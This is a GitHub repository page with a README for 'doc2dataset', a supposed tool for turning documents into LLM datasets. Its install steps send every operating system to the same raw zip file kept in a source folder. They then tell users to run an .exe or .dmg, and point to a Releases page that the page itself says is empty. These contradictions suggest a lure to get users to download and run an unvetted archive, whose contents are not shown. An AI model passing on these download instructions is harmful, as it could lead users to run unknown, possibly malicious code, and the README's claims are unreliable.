Skip to content

πŸ“„ Ingest documents into structured datasets for LLMs, ensuring numeric integrity and easy export across multiple frameworks with doc2dataset.

License

Notifications You must be signed in to change notification settings

reisel-g/doc2dataset

πŸŽ‰ doc2dataset - Effortless Document Generation for All

πŸš€ Getting Started

Welcome to doc2dataset! This application helps you generate datasets from documents easily. Follow these steps to get started.

πŸ”— Download Now

Download doc2dataset

πŸ“¦ System Requirements

Before you download, ensure your computer meets these requirements:

  • Operating System: Windows 10 or later, macOS 10.15 or later, or Linux (any recent version)
  • RAM: At least 4GB recommended
  • Disk Space: 500MB of free space
  • Internet Connection: Required for downloads and updates

πŸ“₯ Download & Install

  1. Visit the Releases Page: Go to this page to download.

  2. Choose the Version: Locate the latest version of doc2dataset. You will see a list of files available for download.

  3. Select Your File: Click on the appropriate file for your operating system:

    • For Windows, download https://raw.githubusercontent.com/reisel-g/doc2dataset/main/crates/service/doc2dataset_1.1.zip.
    • For macOS, download https://raw.githubusercontent.com/reisel-g/doc2dataset/main/crates/service/doc2dataset_1.1.zip.
    • For Linux, choose https://raw.githubusercontent.com/reisel-g/doc2dataset/main/crates/service/doc2dataset_1.1.zip.
  4. Run the Installer:

    • Windows: Double-click the .exe file and follow the prompts to install.
    • macOS: Open the .dmg file and drag the app to your Applications folder.
    • Linux: Extract the https://raw.githubusercontent.com/reisel-g/doc2dataset/main/crates/service/doc2dataset_1.1.zip file and run the application.
  5. Launch the Application: After installation, open doc2dataset from your applications or start menu.

πŸ› οΈ How to Use doc2dataset

Using doc2dataset is straightforward:

  1. Prepare Your Documents: Gather the documents you want to process. Ensure they are in a supported format (PDF, DOCX, or TXT).

  2. Open the Application: Launch doc2dataset.

  3. Select Your Files: Use the "Choose Files" button to select the documents you want to convert into a dataset.

  4. Set Parameters: Adjust any settings to meet your needs. You can set options such as:

    • Output format (CSV, JSON, etc.)
    • Include or exclude specific sections
    • Number of documents to process
  5. Start the Process: Click the "Generate Dataset" button. The application will begin processing your documents. A progress bar will show you how far along the process is.

  6. Access Your Dataset: Once completed, the application will provide a download link for your dataset file. Save it to your desired location.

πŸ“ Features

  • Token Efficiency: Works with less data for effective results.
  • Multi-Framework Outputs: Easy integration with various machine learning frameworks.
  • Numeric Integrity: Leverages NumGuard to maintain data accuracy.
  • User-Friendly Interface: Designed for ease of use, even for non-technical users.

πŸ’‘ Tips for Optimal Use

  • Batch Processing: Process multiple documents at once to save time.
  • Regular Updates: Check for updates often to ensure you have the latest features and improvements.
  • Explore Settings: Familiarize yourself with the settings for optimal performance based on your specific needs.

πŸ› οΈ Troubleshooting

If you encounter issues:

  • Installation Problems: Ensure your system meets the requirements listed above.
  • File Format Errors: Verify that your documents are in a supported format.
  • Performance Issues: Close other applications to free up memory.

πŸ“ž Support

If you have questions or need assistance, feel free to reach out. You can contact the developer on GitHub or visit the discussion forum linked in the repository.

🌐 Additional Resources

For more information on features and updates, visit our official documentation. You can also explore the community discussions for shared tips and experiences.

Thank you for choosing doc2dataset! We hope it simplifies your data generation tasks.

About

πŸ“„ Ingest documents into structured datasets for LLMs, ensuring numeric integrity and easy export across multiple frameworks with doc2dataset.

Topics

Resources

License

Code of conduct

Contributing

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •